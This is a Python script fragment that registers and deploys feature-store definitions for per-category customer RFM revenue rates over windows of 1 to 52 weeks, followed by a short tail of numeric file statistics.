fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_1W', desc='Last weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","52"])
fs.deploy_feature_set('retail_fs','customer_rfm_by_category')
| 375.415459
| 450
| 0.757525
| 9,610
| 77,711
| 5.855983
| 0.016857
| 0.075485
| 0.089825
| 0.056934
| 0.981911
| 0.981733
| 0.981449
| 0.977646
| 0.974305
| 0.973292
| 0
| 0.009825
| 0.08318
| 77,711
| 206
| 451
| 377.237864
| 0.780047
| 0.0022
| 0
| 0.03125
| 0
| 0.005208
| 0.551758
| 0.123804
| 0
| 0
| 0
| 0
| 0
| 1
